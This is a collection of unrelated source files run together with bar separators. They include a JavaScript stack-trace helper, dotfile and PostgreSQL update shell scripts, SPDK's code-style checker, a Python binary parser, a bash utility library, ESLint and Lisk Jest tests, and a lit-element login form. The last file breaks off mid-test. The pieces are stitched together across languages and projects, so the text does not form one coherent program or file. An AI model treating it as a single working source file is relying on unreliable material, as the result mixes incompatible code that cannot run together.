* stacktrace-metadata <https://github.com/tunnckoCore/stacktrace-metadata>
*
* Copyright (c) <NAME> <@tunnckoCore> (https://i.am.charlike.online)
* Released under the MIT license.
*/
'use strict'
var extend = require('extend-shallow')
var findCallsite = require('find-callsite')
var clean = require('clean-stacktrace')
var metadata = require('clean-stacktrace-metadata')
var relativePaths = require('clean-stacktrace-relative-paths')
/**
* > Cleans stack trace and attaches few more metadata properties,
* such as `at`, `line`, `column`, `filename` and `place`. By default
* it cleans stack, makes is short (4 length) and makes paths relative.
* But all this is controllable through `options` object.
* Throws `TypeError` if `error` is not an instance of Error.
*
* **Example**
*
* ```js
* const metadata = require('stacktrace-metadata')
*
* const error = new Error('foo quxie')
* error.stack = `Error: foo quxie
* at zazz (/home/charlike/apps/alwa.js:8:10)
* at module.exports (/home/charlike/apps/foo.js:6:3)
* at Object.<anonymous> (/home/charlike/apps/dush.js:45:3)
* at Module._compile (module.js:409:26)
* at Object.Module._extensions..js (module.js:416:10)
* at Module.load (module.js:343:32)
* at Function.Module._load (module.js:300:12)
* at Function.Module.runMain (module.js:441:10)
* at startup (node.js:139:18)
* `
* const err = metadata(error)
*
* console.log(err.line) // => 8
* console.log(err.column) // => 10
* console.log(err.filename) // => 'alwa.js'
* console.log(err.place) // => 'zazz'
* console.log(err.at) // => 'zazz (alwa.js:8:10)'
* console.log(err.stack)
* // =>
* // Error: foo quxie
* // at zazz (alwa.js:8:10)
* // at module.exports (foo.js:6:3)
* // at Object.<anonymous> (dush.js:45:3)
* ```
*
* @name stacktraceMetadata
* @param {Error} `error` real error object, checked against `instanceof Error`
* @param {Object} `options` optional options object for more control
* @param {Boolean} `options.cleanStack` if `false` won't clean stack trace from node internals
* @param {Boolean} `options.shortStack` if `false` full stack traces, otherwise they are just four
* @param {Boolean} `options.showStack` if `false` the error.stack will be empty string
* @param {Boolean} `options.relativePaths` if `false` paths in stack traces will be absolute
* @param {Function} `options.mapper` called on each line of the stack with `(line, index)` signature
* @param {String} `options.cwd` current working directory, default `process.cwd()`
* @return {Error} same error object, but modified
* @throws {TypeError} If `error` not instance of Error
* @api public
*/
/**
 * Cleans `error.stack` (optionally), shortens it, rewrites paths to be
 * relative, and attaches callsite metadata (`at`, `line`, `column`,
 * `filename`, `place`) to the error.  See the options documented above.
 * Throws TypeError when `error` is not a real Error instance.
 */
module.exports = function stacktraceMetadata (error, options) {
  if (!(error instanceof Error)) {
    throw new TypeError('stacktrace-metadata: expect `error` to be real error')
  }
  if (typeof error.stack === 'string' && error.stack.length) {
    var opts = extend({
      showStack: true,
      shortStack: true,
      cleanStack: true,
      relativePaths: true
    }, options)

    // Rewrites absolute paths to be relative to opts.cwd when enabled.
    var relative = function relative (val) {
      return opts.relativePaths ? relativePaths(opts.cwd)(val) : val
    }

    // Fix: only run the (mapper + relative-path) cleaning pass when it is
    // wanted.  Previously clean() was always computed and then discarded
    // when `opts.cleanStack` was false — wasted work with the same result.
    var stack = opts.cleanStack
      ? clean(error.stack, function mapper (line, index) {
        line = typeof opts.mapper === 'function'
          ? (opts.mapper(line, index) || line)
          : line
        line = relative(line)
        return line
      })
      : error.stack

    // Locate the relevant callsite and copy its metadata onto the error.
    var at = findCallsite(stack, opts)
    metadata(mapdata(error))(at)

    // Trim to the first four lines unless full traces were requested.
    stack = opts.shortStack
      ? stack.split('\n').splice(0, 4).join('\n')
      : stack

    error.stack = opts.showStack ? stack : ''
    return error
  }
  return error
}
/**
 * Builds a `(_, info)` mapper bound to `error` that copies callsite
 * metadata (`line`, `column`, `place`, `filename`) onto the error and
 * composes the human-readable `error.at` string, e.g. `zazz (alwa.js:8:10)`
 * or just `alwa.js:8:10` when no call place is known.
 */
function mapdata (error) {
  return function mapper (_, info) {
    var location = info.filename + ':' + info.line + ':' + info.column

    error.at = info.place.length
      ? info.place + ' (' + location + ')'
      : location
    error.line = info.line
    error.place = info.place
    error.column = info.column
    error.filename = info.filename
  }
}
|
#!/bin/bash
# Fail fast on command errors and on use of unset variables.
set -o errexit
set -o nounset

# Absolute path of the directory containing this script (the dotfiles root).
lawn="$(cd "$(dirname "$0")"; pwd)"
# link <repo-relative src> <home-relative dst>
# Symlinks $lawn/<src> to $HOME/<dst>:
#   - message + skip when the source does not exist,
#   - create parent dirs and the link (green) when the target is absent,
#   - "no change" (blue) when the link already points at the source,
#   - refuse to clobber anything else and report a skip (red).
link() {
    local lawn_path="$lawn/$1"
    local home_path="$HOME/$2"

    if [[ ! -e "$lawn_path" ]]; then
        echo "Nothing present at $lawn_path, skipping."
        return
    fi

    if [[ ! -e "$home_path" ]]; then
        mkdir -p "$(dirname "$home_path")"
        echo "$(tput setaf 2)$(tput bold)$(ln -vsf "$lawn_path" "$home_path")$(tput sgr 0)" | sed "s:$HOME:~:g"
    elif [[ $(readlink "$home_path") == "$lawn_path" ]]; then
        echo "$(tput setaf 4)No change for '$lawn_path'$(tput sgr 0)"
    else
        echo "$(tput setaf 1)$(tput bold)Skipping '$lawn_path -> $home_path'$(tput sgr 0)" | sed "s:$HOME:~:g"
    fi
}
# Wire each repo file/directory into its place under $HOME.
link "shell/zsh" .zshrc
link "vim/vimfiles" .vim
link "tmux.conf" .tmux.conf
link "git/config" .gitconfig
link "alacritty.yml" .config/alacritty.yml
link "mongorc.js" .mongorc.js
link "mongoshrc.js" .mongoshrc.js
link "qutebrowser" .qutebrowser
link "xbar" Library/"Application Support"/xbar/plugins
|
#!/bin/bash
# Apply schema updates: functions first (the later SQL depends on them),
# then per-table updates in parallel, then triggers.
set -e

# subsequent sql depends on functions installed
echo "Creating functions..."
psql "$@" -f functions.sql
echo "done."

# apply updates in parallel across tables
echo -e "\nApplying updates in parallel across tables..."
pids=()
psql "$@" -f apply-updates-non-planet-tables.sql &
pids+=($!)
psql "$@" -f apply-planet_osm_polygon.sql &
pids+=($!)
psql "$@" -f apply-planet_osm_line.sql &
pids+=($!)
psql "$@" -f apply-planet_osm_point.sql &
pids+=($!)

# A bare `wait` discards the children's exit codes; wait on each PID so a
# failed update aborts the script (via set -e).
for pid in "${pids[@]}"; do
    wait "$pid"
done
echo "done."

echo -e '\nApplying triggers...'
psql "$@" -f triggers.sql
echo 'done.'

echo -e "\nAll updates complete. Exiting."
#!/usr/bin/env bash
# Repository style checker.  Resolve the repo root relative to this
# script's location and run everything from there.
readonly BASEDIR=$(readlink -f $(dirname $0))/..
cd $BASEDIR

# exit on errors
set -e
# Fallback for systems without nproc (e.g. macOS): assume 8 CPUs so the
# parallel invocations below still have a degree of parallelism.
if ! hash nproc 2>/dev/null; then

function nproc() {
	echo 8
}

fi
function version_lt() {
[ $( echo -e "$1\n$2" | sort -V | head -1 ) != "$1" ]
}
rc=0
echo -n "Checking file permissions..."
while read -r perm _res0 _res1 path; do
if [ ! -f "$path" ]; then
continue
fi
fname=$(basename -- "$path")
case ${fname##*.} in
c|h|cpp|cc|cxx|hh|hpp|md|html|js|json|svg|Doxyfile|yml|LICENSE|README|conf|in|Makefile|mk|gitignore|go|txt)
# These file types should never be executable
if [ "$perm" -eq 100755 ]; then
echo "ERROR: $path is marked executable but is a code file."
rc=1
fi
;;
*)
shebang=$(head -n 1 $path | cut -c1-3)
# git only tracks the execute bit, so will only ever return 755 or 644 as the permission.
if [ "$perm" -eq 100755 ]; then
# If the file has execute permission, it should start with a shebang.
if [ "$shebang" != "#!/" ]; then
echo "ERROR: $path is marked executable but does not start with a shebang."
rc=1
fi
else
# If the file doesnot have execute permissions, it should not start with a shebang.
if [ "$shebang" = "#!/" ]; then
echo "ERROR: $path is not marked executable but starts with a shebang."
rc=1
fi
fi
;;
esac
done <<< "$(git grep -I --name-only --untracked -e . | git ls-files -s)"
if [ $rc -eq 0 ]; then
echo " OK"
fi
# C/C++ coding style: run astyle in-place and flag any files it reformats.
if hash astyle; then
echo -n "Checking coding style..."
if [ "$(astyle -V)" \< "Artistic Style Version 3" ]
then
echo -n " Your astyle version is too old so skipping coding style checks. Please update astyle to at least 3.0.1 version..."
else
rm -f astyle.log
touch astyle.log
# Exclude rte_vhost code imported from DPDK - we want to keep the original code
# as-is to enable ongoing work to synch with a generic upstream DPDK vhost library,
# rather than making diffs more complicated by a lot of changes to follow SPDK
# coding standards.
git ls-files '*.[ch]' '*.cpp' '*.cc' '*.cxx' '*.hh' '*.hpp' | \
grep -v rte_vhost | grep -v cpp_headers | \
xargs -P$(nproc) -n10 astyle --options=.astylerc >> astyle.log
if grep -q "^Formatted" astyle.log; then
echo " errors detected"
git diff
sed -i -e 's/ / /g' astyle.log
grep --color=auto "^Formatted.*" astyle.log
echo "Incorrect code style detected in one or more files."
echo "The files have been automatically formatted."
echo "Remember to add the files to your commit."
rc=1
else
echo " OK"
fi
rm -f astyle.log
fi
else
echo "You do not have astyle installed so your code style is not being checked!"
fi
GIT_VERSION=$( git --version | cut -d' ' -f3 )
# The remaining checks rely on git pathspec magic (":!...") — bail out on old git.
if version_lt "1.9.5" "${GIT_VERSION}"; then
# git <1.9.5 doesn't support pathspec magic exclude
echo " Your git version is too old to perform all tests. Please update git to at least 1.9.5 version..."
exit 0
fi
echo -n "Checking comment style..."
git grep --line-number -e '/[*][^ *-]' -- '*.[ch]' > comment.log || true
git grep --line-number -e '[^ ][*]/' -- '*.[ch]' ':!lib/rte_vhost*/*' >> comment.log || true
git grep --line-number -e '^[*]' -- '*.[ch]' >> comment.log || true
git grep --line-number -e '\s//' -- '*.[ch]' >> comment.log || true
git grep --line-number -e '^//' -- '*.[ch]' >> comment.log || true
if [ -s comment.log ]; then
echo " Incorrect comment formatting detected"
cat comment.log
rc=1
else
echo " OK"
fi
rm -f comment.log
# The following checks share one pattern: grep for a violation into a log
# file, and fail (rc=1) when the log is non-empty.
echo -n "Checking for spaces before tabs..."
git grep --line-number $' \t' -- './*' ':!*.patch' > whitespace.log || true
if [ -s whitespace.log ]; then
echo " Spaces before tabs detected"
cat whitespace.log
rc=1
else
echo " OK"
fi
rm -f whitespace.log
echo -n "Checking trailing whitespace in output strings..."
git grep --line-number -e ' \\n"' -- '*.[ch]' > whitespace.log || true
if [ -s whitespace.log ]; then
echo " Incorrect trailing whitespace detected"
cat whitespace.log
rc=1
else
echo " OK"
fi
rm -f whitespace.log
echo -n "Checking for use of forbidden library functions..."
git grep --line-number -w '\(atoi\|atol\|atoll\|strncpy\|strcpy\|strcat\|sprintf\|vsprintf\)' -- './*.c' ':!lib/rte_vhost*/**' > badfunc.log || true
if [ -s badfunc.log ]; then
echo " Forbidden library functions detected"
cat badfunc.log
rc=1
else
echo " OK"
fi
rm -f badfunc.log
echo -n "Checking for use of forbidden CUnit macros..."
git grep --line-number -w 'CU_ASSERT_FATAL' -- 'test/*' ':!test/spdk_cunit.h' > badcunit.log || true
if [ -s badcunit.log ]; then
echo " Forbidden CU_ASSERT_FATAL usage detected - use SPDK_CU_ASSERT_FATAL instead"
cat badcunit.log
rc=1
else
echo " OK"
fi
rm -f badcunit.log
echo -n "Checking blank lines at end of file..."
if ! git grep -I -l -e . -z './*' ':!*.patch' | \
xargs -0 -P$(nproc) -n1 scripts/eofnl > eofnl.log; then
echo " Incorrect end-of-file formatting detected"
cat eofnl.log
rc=1
else
echo " OK"
fi
rm -f eofnl.log
echo -n "Checking for POSIX includes..."
git grep -I -i -f scripts/posix.txt -- './*' ':!include/spdk/stdinc.h' ':!include/linux/**' ':!lib/rte_vhost*/**' ':!scripts/posix.txt' ':!*.patch' > scripts/posix.log || true
if [ -s scripts/posix.log ]; then
echo "POSIX includes detected. Please include spdk/stdinc.h instead."
cat scripts/posix.log
rc=1
else
echo " OK"
fi
rm -f scripts/posix.log
echo -n "Checking #include style..."
git grep -I -i --line-number "#include <spdk/" -- '*.[ch]' > scripts/includes.log || true
if [ -s scripts/includes.log ]; then
echo "Incorrect #include syntax. #includes of spdk/ files should use quotes."
cat scripts/includes.log
rc=1
else
echo " OK"
fi
rm -f scripts/includes.log
# Python style: prefer pycodestyle, fall back to its older name pep8.
if hash pycodestyle 2>/dev/null; then
PEP8=pycodestyle
elif hash pep8 2>/dev/null; then
PEP8=pep8
fi
# NOTE(review): ${PEP8} is unset when neither tool exists; this relies on the
# script NOT using `set -u` — confirm before enabling nounset.
if [ -n "${PEP8}" ]; then
echo -n "Checking Python style..."
PEP8_ARGS+=" --max-line-length=140"
error=0
git ls-files '*.py' | xargs -P$(nproc) -n1 $PEP8 $PEP8_ARGS > pep8.log || error=1
if [ $error -ne 0 ]; then
echo " Python formatting errors detected"
cat pep8.log
rc=1
else
echo " OK"
fi
rm -f pep8.log
else
echo "You do not have pycodestyle or pep8 installed so your Python style is not being checked!"
fi
# Bash style via shellcheck; newer shellcheck can emit a diff we auto-apply.
if hash shellcheck 2>/dev/null; then
echo -n "Checking Bash style..."
shellcheck_v=$(shellcheck --version | grep -P "version: [0-9\.]+" | cut -d " " -f2)
# SHCK_EXCLUDE contains a list of all of the shellcheck errors found in SPDK scripts
# currently. New errors should only be added to this list if the cost of fixing them
# is deemed too high. For more information about the errors, go to:
# https://github.com/koalaman/shellcheck/wiki/Checks
# Error descriptions can also be found at: https://github.com/koalaman/shellcheck/wiki
# SPDK fails some error checks which have been deprecated in later versions of shellcheck.
# We will not try to fix these error checks, but instead just leave the error types here
# so that we can still run with older versions of shellcheck.
SHCK_EXCLUDE="SC1117"
# SPDK has decided to not fix violations of these errors.
# We are aware about below exclude list and we want this errors to be excluded.
# SC1083: This {/} is literal. Check expression (missing ;/\n?) or quote it.
# SC1090: Can't follow non-constant source. Use a directive to specify location.
# SC1091: Not following: (error message here)
# SC2001: See if you can use ${variable//search/replace} instead.
# SC2010: Don't use ls | grep. Use a glob or a for loop with a condition to allow non-alphanumeric filenames.
# SC2015: Note that A && B || C is not if-then-else. C may run when A is true.
# SC2016: Expressions don't expand in single quotes, use double quotes for that.
# SC2034: foo appears unused. Verify it or export it.
# SC2046: Quote this to prevent word splitting.
# SC2086: Double quote to prevent globbing and word splitting.
# SC2119: Use foo "$@" if function's $1 should mean script's $1.
# SC2120: foo references arguments, but none are ever passed.
# SC2148: Add shebang to the top of your script.
# SC2153: Possible Misspelling: MYVARIABLE may not be assigned, but MY_VARIABLE is.
# SC2154: var is referenced but not assigned.
# SC2164: Use cd ... || exit in case cd fails.
# SC2174: When used with -p, -m only applies to the deepest directory.
# SC2206: Quote to prevent word splitting/globbing,
# or split robustly with mapfile or read -a.
# SC2207: Prefer mapfile or read -a to split command output (or quote to avoid splitting).
# SC2223: This default assignment may cause DoS due to globbing. Quote it.
SHCK_EXCLUDE="$SHCK_EXCLUDE,SC1083,SC1090,SC1091,SC2010,SC2015,SC2016,SC2034,SC2046,SC2086,\
SC2119,SC2120,SC2148,SC2153,SC2154,SC2164,SC2174,SC2001,SC2206,SC2207,SC2223"
SHCK_FORMAT="diff"
SHCK_APPLY=true
# shellcheck < 0.7.0 has no diff output format, so fall back to tty output
# and disable the auto-apply step.
if [ "$shellcheck_v" \< "0.7.0" ]; then
SHCK_FORMAT="tty"
SHCK_APPLY=false
fi
SHCH_ARGS=" -x -e $SHCK_EXCLUDE -f $SHCK_FORMAT"
error=0
git ls-files '*.sh' | xargs -P$(nproc) -n1 shellcheck $SHCH_ARGS &> shellcheck.log || error=1
if [ $error -ne 0 ]; then
echo " Bash formatting errors detected!"
# Some errors are not auto-fixable. Fall back to tty output.
if grep -q "Use another format to see them." shellcheck.log; then
SHCK_FORMAT="tty"
SHCK_APPLY=false
SHCH_ARGS=" -e $SHCK_EXCLUDE -f $SHCK_FORMAT"
git ls-files '*.sh' | xargs -P$(nproc) -n1 shellcheck $SHCH_ARGS > shellcheck.log || error=1
fi
cat shellcheck.log
if $SHCK_APPLY; then
git apply shellcheck.log
echo "Bash errors were automatically corrected."
echo "Please remember to add the changes to your commit."
fi
rc=1
else
echo " OK"
fi
rm -f shellcheck.log
else
echo "You do not have shellcheck installed so your Bash style is not being checked!"
fi
# Check if any of the public interfaces were modified by this patch.
# Warn the user to consider updating the changelog any changes
# are detected.
echo -n "Checking whether CHANGELOG.md should be updated..."
staged=$(git diff --name-only --cached .)
working=$(git status -s --porcelain --ignore-submodules | grep -iv "??" | awk '{print $2}')
files="$staged $working"
# With nothing staged or dirty, fall back to the files touched by HEAD.
if [[ "$files" = " " ]]; then
files=$(git diff-tree --no-commit-id --name-only -r HEAD)
fi
has_changelog=0
for f in $files; do
if [[ $f == CHANGELOG.md ]]; then
# The user has a changelog entry, so exit.
has_changelog=1
break
fi
done
needs_changelog=0
if [ $has_changelog -eq 0 ]; then
for f in $files; do
if [[ $f == include/spdk/* ]] || [[ $f == scripts/rpc.py ]] || [[ $f == etc/* ]]; then
echo ""
echo -n "$f was modified. Consider updating CHANGELOG.md."
needs_changelog=1
fi
done
fi
if [ $needs_changelog -eq 0 ]; then
echo " OK"
else
echo ""
fi
exit $rc
|
from construct import Struct, GreedyRange, Int32ul

try:
    # Schema: a greedy run of little-endian unsigned 32-bit integers,
    # consumed until the end of the stream.
    uint32_sequence = Struct(
        'numbers' / GreedyRange(Int32ul),
    )

    # Load the raw bytes and decode them against the schema.
    with open('input.bin', 'rb') as binary_file:
        raw_bytes = binary_file.read()
    decoded = uint32_sequence.parse(raw_bytes)

    # Report the total of every decoded integer.
    sum_of_integers = sum(decoded['numbers'])
    print(f"The sum of the integers in the sequence is: {sum_of_integers}")
except FileNotFoundError:
    print("Error: The input file 'input.bin' was not found.")
except Exception as e:
    print(f"An error occurred: {e}")
#!/usr/bin/env bash
# This library holds common bash variables and utility functions.
# Variables
#
OS="$(go env GOOS)"
ARCH="$(go env GOARCH)"
# NOTE(review): when this file is sourced, $0 is the *caller's* path, so
# root_dir assumes callers live one directory below the repo root — confirm.
root_dir="$(cd "$(dirname "$0")/.." ; pwd)"
dest_dir="${root_dir}/bin"
# Ensure the tool destination exists at source time.
mkdir -p "${dest_dir}"
# kind
kind_version="v0.8.1"
kind_bin_name="kind-${OS}-${ARCH}"
kind_path="${dest_dir}/kind"
#kubectl
kubectl_path="${dest_dir}/kubectl"
# Utility Functions
#
#
# util::command-installed checks if the command from argument 1 is installed.
#
# Globals:
#   None
# Arguments:
#   - 1: command name to check if it is installed in PATH
# Returns:
#   0 if command is installed in PATH
#   1 if the command is NOT installed in PATH
function util::command-installed() {
  if command -v "${1}" >/dev/null 2>&1; then
    return 0
  fi
  return 1
}
readonly -f util::command-installed
# util::log prints the supplied message with a common "#####" header.
#
# Globals:
#   None
# Arguments:
#   - 1: string to print
# Returns:
#   0
function util::log() {
  printf '%s\n' "##### ${1}..."
}
readonly -f util::log
# util::wait-for-condition blocks until the provided condition becomes true
#
# Globals:
#   None
# Arguments:
#   - 1: message indicating what conditions is being waited for (e.g. 'config to be written')
#   - 2: a string representing an eval'able condition. When eval'd it should not output
#        anything to stdout or stderr.
#   - 3: optional timeout in seconds. If not provided, waits forever.
# Returns:
#   1 if the condition is not met before the timeout
function util::wait-for-condition() {
local msg=$1
# condition should be a string that can be eval'd.
local condition=$2
local timeout=${3:-}
local start_msg="Waiting for ${msg}"
local error_msg="[ERROR] Timeout waiting for ${msg}"
# counter doubles as "seconds elapsed" and "have we printed the start message".
local counter=0
while ! eval ${condition}; do
if [[ "${counter}" = "0" ]]; then
echo -n "${start_msg}"
fi
# No timeout: wait forever silently. With a timeout: print a progress dot
# each second until the limit is reached.
if [[ -z "${timeout}" || "${counter}" -lt "${timeout}" ]]; then
counter=$((counter + 1))
if [[ -n "${timeout}" ]]; then
echo -n '.'
fi
sleep 1
else
echo -e "\n${error_msg}"
return 1
fi
done
# Terminate the progress-dot line once the condition finally holds.
if [[ "${counter}" != "0" && -n "${timeout}" ]]; then
echo ' done'
fi
}
readonly -f util::wait-for-condition
|
<reponame>nvonahsen/toolbelt
from .functions import *
from .CocoDataset import CocoDataset |
// Regression tests for the shared ESLint config: lint each fixture file via
// the helper exported by ../jest.setup and compare the formatted output.
// The inline snapshots pin the exact lint messages, so they must not change.
const getErrors = require('../jest.setup')(__dirname);
// A clean fixture produces no lint output at all.
test('ok', async () => {
expect(await getErrors('ok.js')).toEqual('');
});
test('no-mixed-spaces-and-tabs', async () => {
expect(await getErrors('no-mixed-spaces-and-tabs.js')).toMatchInlineSnapshot(`
"__fixtures__/no-mixed-spaces-and-tabs.js: line 2, col 1, Error - Expected indentation of 2 spaces but found 1 tab. (indent)
1 problem"
`);
});
// NOTE(review): this fixture currently triggers a *parsing* error, not the
// arrow-parens rule itself — presumably intentional; confirm the fixture.
test('arrow-parens', async () => {
expect(await getErrors('arrow-parens.js')).toMatchInlineSnapshot(`
"__fixtures__/arrow-parens.js: line 2, col 4, Error - Parsing error: Unexpected token >
1 problem"
`);
});
test('indent', async () => {
expect(await getErrors('indent.js')).toMatchInlineSnapshot(`
"__fixtures__/indent.js: line 3, col 1, Error - Expected indentation of 4 spaces but found 6. (indent)
1 problem"
`);
});
|
import { LitElement, html } from '../../vendor/lit-element/lit-element.js'
import * as session from '../lib/session.js'
/**
 * <app-session> — shows a login form (plus an error banner on failure) when
 * no session is active, and renders nothing when the user is logged in.
 * Rendered into light DOM so the page's global (Tailwind) styles apply.
 */
class AppSession extends LitElement {
  static get properties () {
    return {
      currentError: {type: String}
    }
  }

  createRenderRoot() {
    return this // dont use shadow dom
  }

  constructor () {
    super()
    this.currentError = undefined
    // NOTE: isLoggedIn is not a declared reactive property; the explicit
    // requestUpdate() in the onChange callback is what triggers re-renders.
    this.isLoggedIn = true
    session.onChange(() => {
      this.isLoggedIn = session.isActive()
      this.requestUpdate()
    })
  }

  render () {
    if (!this.isLoggedIn) {
      return html`
        <div class="bg-yellow-200 font-medium px-4 py-2 sm:rounded text-lg text-yellow-700">You are not currently logged in.</div>
        <form class="flex items-center my-1" @submit=${this.onSubmit}>
          <input type="text" name="username" placeholder="Username" class="bg-white px-2 py-1 rounded mr-1">
          <input type="password" name="password" placeholder="Password" class="bg-white px-2 py-1 rounded mr-1">
          <button class="bg-blue-600 text-white px-2 py-1" type="submit">Login</button>
        </form>
        ${this.currentError ? html`
          <div class="bg-red-200 font-medium px-4 py-2 sm:rounded text-lg text-red-700">${this.currentError}</div>
        ` : ''}
      `
    }
    return html``
  }

  // events
  // =

  /**
   * Handle login form submission: attempt the login, surfacing any failure
   * in the error banner.
   * @param {Event} e - the form "submit" event
   */
  async onSubmit (e) {
    e.preventDefault()
    e.stopPropagation()
    this.currentError = undefined
    try {
      await session.doLogin({
        username: e.currentTarget.username.value,
        password: e.currentTarget.password.value
      })
    } catch (err) {
      // Fix: the catch variable was previously named `e`, shadowing the
      // event parameter — error-prone if the handler ever touches the event
      // inside the catch block.
      this.currentError = err.toString()
    }
  }
}
customElements.define('app-session', AppSession)
/*
* Copyright © 2020 Lisk Foundation
*
* See the LICENSE file at the top-level directory of this distribution
* for licensing information.
*
* Unless otherwise agreed in a custom licensing agreement with the Lisk Foundation,
* no part of this software, including this file, may be copied, modified,
* propagated, or distributed except according to the terms contained in the
* LICENSE file.
*
* Removal or modification of this copyright notice is prohibited.
*/
import { BFT } from '@liskhq/lisk-bft';
import { codec } from '@liskhq/lisk-codec';
import { KVStore } from '@liskhq/lisk-db';
import { TransactionPool } from '@liskhq/lisk-transaction-pool';
import { when } from 'jest-when';
import { InMemoryChannel } from '../../../src/controller/channels';
import { BaseModule, DPoSModule, TokenModule } from '../../../src/modules';
import { Forger, HighFeeForgingStrategy } from '../../../src/node/forger';
import { Network } from '../../../src/node/network';
import { Node } from '../../../src/node/node';
import { Processor } from '../../../src/node/processor';
import { Synchronizer } from '../../../src/node/synchronizer/synchronizer';
import { cacheConfig, nodeOptions } from '../../fixtures/node';
import { createMockBus } from '../../utils/channel';
import { createGenesisBlock } from '../../../src/testing/create_genesis_block';
jest.mock('@liskhq/lisk-db');
jest.mock('fs-extra');
// Unit tests for the framework Node: construction validation, init wiring
// (modules, BFT, forger, network), cleanup, and the forging task/loop.
// Heavy collaborators (KVStore, Processor, Synchronizer) are jest-mocked.
describe('Node', () => {
let node: Node;
let subscribedEvents: any;
const stubs: any = {};
let blockchainDB: KVStore;
let forgerDB: KVStore;
let nodeDB: KVStore;
let tokenModule: BaseModule;
let dposModule: BaseModule;
// Genesis block shared by every test; also serves as the expected lastBlock.
const { genesisBlock, genesisBlockJSON } = createGenesisBlock({
modules: [TokenModule, DPoSModule],
});
const lastBlock = genesisBlock;
beforeEach(() => {
// Arrange
subscribedEvents = {};
jest.spyOn(Processor.prototype, 'init').mockResolvedValue(undefined);
jest.spyOn(Synchronizer.prototype, 'init').mockResolvedValue(undefined);
blockchainDB = new KVStore('blockchain.db');
forgerDB = new KVStore('forger.db');
nodeDB = new KVStore('node.db');
tokenModule = new TokenModule(nodeOptions.genesisConfig);
dposModule = new DPoSModule(nodeOptions.genesisConfig);
/* Arranging Stubs start */
stubs.logger = {
trace: jest.fn(),
error: jest.fn(),
debug: jest.fn(),
fatal: jest.fn(),
info: jest.fn(),
cleanup: jest.fn(),
};
stubs.forgerDB = {
get: jest.fn(),
put: jest.fn(),
close: jest.fn(),
};
// Channel stub records event subscriptions so tests can fire them manually.
stubs.channel = {
invoke: jest.fn(),
subscribe: jest.fn((event, cb) => {
subscribedEvents[event] = cb;
}),
once: jest.fn(),
registerToBus: jest.fn(),
};
when(stubs.channel.invoke)
.calledWith('app:getComponentConfig', 'cache')
.mockResolvedValue(cacheConfig as never);
node = new Node({
options: nodeOptions,
});
codec.clearCache();
node.registerModule(tokenModule);
// Because the genesis block contains a delegate, so we must register dpos module to process it
node.registerModule(dposModule);
});
describe('constructor', () => {
it('should throw error when waitThreshold is greater than blockTime', () => {
const invalidChainOptions = {
...nodeOptions,
forging: {
waitThreshold: 5,
},
genesisConfig: {
...nodeOptions.genesisConfig,
blockTime: 4,
},
};
expect(
() =>
new Node({
options: invalidChainOptions as any,
}),
).toThrow('forging.waitThreshold=5 is greater or equal to genesisConfig.blockTime=4');
});
it('should throw error when waitThreshold is same as blockTime', () => {
const invalidChainOptions = {
...nodeOptions,
forging: {
waitThreshold: 5,
},
genesisConfig: {
...nodeOptions.genesisConfig,
blockTime: 5,
},
};
expect(
() =>
new Node({
options: invalidChainOptions as any,
}),
).toThrow('forging.waitThreshold=5 is greater or equal to genesisConfig.blockTime=5');
});
});
describe('init', () => {
beforeEach(async () => {
jest.spyOn(Network.prototype, 'applyNodeInfo');
jest.spyOn(TransactionPool.prototype, 'start');
jest.spyOn(node as any, '_startForging');
jest.spyOn(Processor.prototype, 'register');
jest.spyOn(InMemoryChannel.prototype, 'registerToBus');
jest.spyOn(tokenModule, 'init');
// Act
await node.init({
genesisBlockJSON,
dataPath: `/tmp/.lisk/${Date.now()}`,
bus: createMockBus() as any,
channel: stubs.channel,
blockchainDB,
forgerDB,
nodeDB,
logger: stubs.logger,
});
});
it('should initialize scope object with valid structure', () => {
expect(node).toHaveProperty('_options');
expect(node).toHaveProperty('_channel');
expect(node).toHaveProperty('_networkIdentifier');
});
describe('_initModules', () => {
it('should initialize bft module', () => {
expect(node['_bft']).toBeInstanceOf(BFT);
});
it('should initialize forger module', () => {
expect(node['_forger']).toBeInstanceOf(Forger);
});
it('should initialize forger module with high fee strategy', () => {
expect(node['_forger']['_forgingStrategy']).toBeInstanceOf(HighFeeForgingStrategy);
});
});
describe('on-chain modules', () => {
it('should register custom module with processor', () => {
expect(node['_processor'].register).toHaveBeenCalledTimes(2);
expect(node['_processor'].register).toHaveBeenCalledWith(tokenModule);
expect(node['_processor'].register).toHaveBeenCalledWith(dposModule);
});
it('should register in-memory channel to bus', () => {
// one time for each module
expect(InMemoryChannel.prototype.registerToBus).toHaveBeenCalledTimes(2);
expect(InMemoryChannel.prototype.registerToBus).toHaveBeenCalledWith(node['_bus']);
});
it('should init custom module', () => {
expect(tokenModule.init).toHaveBeenCalledTimes(1);
expect(tokenModule.init).toHaveBeenCalledWith(
expect.objectContaining({
channel: { publish: expect.any(Function) },
dataAccess: {
getChainState: expect.any(Function),
getAccountByAddress: expect.any(Function),
getLastBlockHeader: expect.any(Function),
},
logger: stubs.logger,
}),
);
});
});
it('should invoke Processor.init', () => {
expect(node['_processor'].init).toHaveBeenCalledTimes(1);
});
it('should call "applyNodeInfo" with correct params', () => {
// Assert
return expect(node['_networkModule'].applyNodeInfo).toHaveBeenCalledWith({
height: lastBlock.header.height,
blockVersion: lastBlock.header.version,
maxHeightPrevoted: 0,
lastBlockID: lastBlock.header.id,
});
});
it('should start transaction pool', () => {
return expect(node['_transactionPool'].start).toHaveBeenCalled();
});
it('should start forging', () => {
return expect(node['_startForging']).toHaveBeenCalled();
});
});
describe('getSchema', () => {
it('should return all schema with currently registered modules', () => {
const schema = node.getSchema();
expect(Object.keys(schema.account.properties)).toInclude('token');
expect(Object.keys(schema.blockHeadersAssets).length).toBeGreaterThanOrEqual(2);
expect(schema.block).not.toBeUndefined();
expect(schema.blockHeader).not.toBeUndefined();
expect(schema.transaction).not.toBeUndefined();
});
});
describe('getRegisteredModules', () => {
it('should return currently registered modules information', () => {
const registeredModules = node.getRegisteredModules();
expect(registeredModules).toHaveLength(2);
expect(registeredModules[0].name).toEqual('token');
expect(registeredModules[1].name).toEqual('dpos');
});
});
describe('cleanup', () => {
beforeEach(async () => {
// Arrange
await node.init({
genesisBlockJSON,
dataPath: `/tmp/.lisk/${Date.now()}`,
bus: createMockBus() as any,
channel: stubs.channel,
blockchainDB,
forgerDB,
nodeDB,
logger: stubs.logger,
});
jest.spyOn(node['_transactionPool'], 'stop');
jest.spyOn(node['_processor'], 'stop');
jest.spyOn(node['_synchronizer'], 'stop');
jest.spyOn(node['_networkModule'], 'cleanup');
});
it('should be an async function', () => {
// Assert
return expect(node.cleanup.constructor.name).toEqual('AsyncFunction');
});
it('should call stop for running tasks', async () => {
await node.cleanup();
